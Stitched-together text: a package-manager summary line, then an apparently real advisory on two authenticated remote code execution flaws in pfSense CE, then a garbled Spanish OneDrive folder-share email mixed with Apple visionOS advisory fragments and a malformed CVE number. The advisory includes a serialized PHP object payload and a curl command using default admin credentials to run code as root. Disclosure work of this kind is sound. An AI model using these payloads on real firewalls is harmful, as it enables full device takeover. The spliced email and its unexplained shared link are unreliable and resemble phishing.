Summary: Upgrading: 2, Installing: 1, Removing: 0, Not Upgrading: 0 Download size: 275 kB Space needed: 50.2 kB / 873 GB available
Advisory: Authenticated Remote Code Execution in pfSense CECVEs: CVE-2025-69690, CVE-2025-69691 Researcher: Nelson Adhepeau ([email protected]) Date: February 2026 == RESPONSIBLE DISCLOSURE NOTICE == This advisory is published in accordance with responsible disclosure practices. The vendor was notified on December 2, 2025, acknowledged the reports, and indicated no patches would be issued. Publication follows standard 90-day disclosure guidelines. ------------------------------------------------------------- == OVERVIEW == Two independent authenticated Remote Code Execution vulnerabilities were discovered in Netgate pfSense Community Edition. Both were reproduced on clean installations. Vendor was contacted and acknowledged the reports but classified both as expected behavior for authenticated administrators. ------------------------------------------------------------- == CVE-2025-69690 == Authenticated RCE via Unsafe Deserialization (pfSense CE 2.7.2) CVSS v3.1: 8.8 (High) Vector: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H CWE-502: Deserialization of Untrusted Data CWE-915: Improperly Controlled Dynamic Code Evaluation -- Description -- The pfSense configuration restore mechanism invokes unserialize() on user-controlled data without class whitelisting, input validation, or sandboxing. A crafted backup file containing a malicious serialized PHP object can inject arbitrary commands via the post_reboot_commands property, executed through mwexec() with full root privileges. -- Affected Component -- backup/restore mechanism, config.php, pfsense_module_installer class, unserialize() handling -- Attack Vector -- 1. Attacker authenticates as administrator 2. Uploads malicious configuration backup file 3. Triggers restore operation 4. pfSense unserializes attacker-controlled data 5. Commands execute as root via mwexec() -- PoC Payload -- O:23:"pfsense_module_installer":1:{ s:17:"*post_reboot_commands"; a:1:{i:0;s:40:"/usr/local/bin/php -r 'system(\"id\");'";}} -- Impact -- - Arbitrary command execution as root - Persistent compromise - Complete firewall takeover - Credential and configuration exfiltration -- Vendor Response -- Netgate acknowledged the report. Classified as "authenticated administrative abuse". No patch issued. Vendor does not assign CVEs directly. ------------------------------------------------------------- == CVE-2025-69691 == Authenticated RCE via XMLRPC exec_php (pfSense CE 2.8.0) CVSS v3.1: 9.9 (Critical) Vector: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H CWE-284: Improper Access Control CWE-915: Improperly Controlled Dynamic Code Evaluation -- Description -- pfSense CE 2.8.0 exposes an XMLRPC API method pfsense.exec_php that executes arbitrary PHP code as root without validation, sandboxing, or restrictions. The endpoint is enabled by default, accessible over HTTPS via Basic Authentication, and executes supplied code immediately with full system privileges. Default credentials (admin:pfsense) are widely deployed, significantly lowering the exploitation barrier. -- Affected Component -- xmlrpc.php, pfsense.exec_php method, XMLRPC API handler, BasicAuth authentication layer -- Attack Vector -- curl -k -u admin:pfsense \ -d '<methodCall> <methodName>pfsense.exec_php</methodName> <params><param><value><string> system("id"); </string></value></param></params> </methodCall>' \ https://<target>/xmlrpc.php -- Impact -- - Full remote root compromise - Arbitrary file read/write - Backdoor deployment - Firewall rule manipulation - Extraction of secrets and configurations ________________________________________ From: Cristian Trinidad <[email protected]> Sent: Tuesday, February 17, 2026 09:43 To: [email protected]; [email protected] Subject: Cristian Trinidad ha compartido la carpeta "Documentos" contigo [Compartir imagen] Cristian Trinidad le ha invitado a acceder a una carpeta CFNetwork Available for: Apple Vision Pro (C78PSx 20260115202647407840) Impact: A remote user may be able to write arbitrary files Description: A path handling issue was addressed with improved logic. CVE-2026-US20110303562A1: Cristian (Lens.bsd) APPLE-SA-02-11-2026-8 visionOS 26.3 2+visionOS 26.3 addresses the following issues. Information about the security content is also available at https://support.apple.com/126353. <https://1drv.ms/f/c/0a6395b4369b952a/IgBH57LUhc6SQZdJO87pxgM9AesFAftiqzZ6kxVo_19ltdI?e=5%3ar49nkh&sharingv2=true&fromShare=true&at=9> [icon] Documentos [permission globe icon] Este vínculo funcionará para cualquier persona. Abrir <https://1drv.ms/f/c/0a6395b4369b952a/IgBH57LUhc6SQZdJO87pxgM9AesFAftiqzZ6kxVo_19ltdI?e=5%3ar49nkh&sharingv2=true&fromShare=true&at=9> [Microsoft logo] Declaración de privacidad <https://aka.ms/privacy>
